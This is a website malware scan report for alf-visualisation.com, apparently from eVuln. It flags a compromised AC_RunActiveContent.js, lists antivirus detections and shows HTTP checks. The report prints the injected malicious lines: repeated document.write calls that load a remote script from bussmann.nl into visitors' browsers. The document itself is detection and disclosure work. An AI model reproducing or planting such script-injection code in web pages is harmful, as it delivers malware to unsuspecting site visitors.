New scan:

Malware Scanner report for alf-visualisation.com

Malicious/Suspicious/Total urls checked
1/0/5
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "alf-visualisation.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=alf-visualisation.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://alf-visualisation.com/
200 OK
Content-Length: 2005
Content-Type: text/html
clean
http://alf-visualisation.com/AC_RunActiveContent.js
200 OK
Content-Length: 29329
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;
function ControlVersion()
{
var version;
var axo;
var e;

try {
axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
version = axo.GetVariable("$version");
} catch (e) {
}
if (!version)
... 3650 bytes are skipped ...
p ><\/script>');
document.write('<script src=http://bussmann.nl/files/zoeken.php ><\/script>');
document.write('<script src=http://bussmann.nl/files/zoeken.php ><\/script>');
document.write('<script src=http://bussmann.nl/files/zoeken.php ><\/script>');
document.write('<script src=http://bussmann.nl/files/zoeken.php ><\/script>');
document.write('<script src=http://bussmann.nl/files/zoeken.php ><\/script>');

Antivirus reports:

AntiVir
JS/Gamburl.U
Avast
JS:Includer-APW [Trj]
Ikarus
Trojan.JS.Gamburl
K7AntiVirus
Trojan ( eb6a3cbb0 )
TrendMicro-HouseCall
TROJ_GEN.F47V1113
Comodo
UnclassifiedMalware
K7GW
Exploit ( 04c55e041 )
McAfee-GW-Edition
JS/Redirector.o
Microsoft
Trojan:JS/Gamburl.E
Kaspersky
HEUR:Trojan.Script.Generic
TotalDefense
JS/Redirector!generic
McAfee
JS/Redirector.o
NANO-Antivirus
Trojan.Html.Iframe.cmxlfn
VIPRE
Trojan-Clicker.HTML.RemoteScript (v)
F-Prot
HTML/Linker.U
GData
Script.Trojan.Agent.2FWSUO
Commtouch
HTML/Linker.U
ESET-NOD32
JS/TrojanDownloader.HackLoad.AF

http://bussmann.nl/files/zoeken.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 13 Jan 2015 00:31:43 GMT
Location: http://www.bussmann.nl/files/zoeken.php
Server: Apache/2.2.3 (CentOS)
Content-Length: 323
Content-Type: text/html; charset=iso-8859-1
clean
http://www.bussmann.nl/files/zoeken.php
404 Not Found
Content-Length: 294
Content-Type: text/html
clean
http://www.bussmann.nl/test404page.js
404 Not Found
Content-Length: 292
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: alf-visualisation.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 00:31:41 GMT
Accept-Ranges: bytes
ETag: "7d5-49454bb288040"
Server: Apache
Vary: Accept-Encoding
Content-Length: 2005
Content-Type: text/html
Last-Modified: Fri, 05 Nov 2010 21:12:25 GMT

...2005 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: alf-visualisation.com
Referer: http://www.google.com/search?q=alf-visualisation.com

Result:
The result is similar to the first query. There are no suspicious redirects found.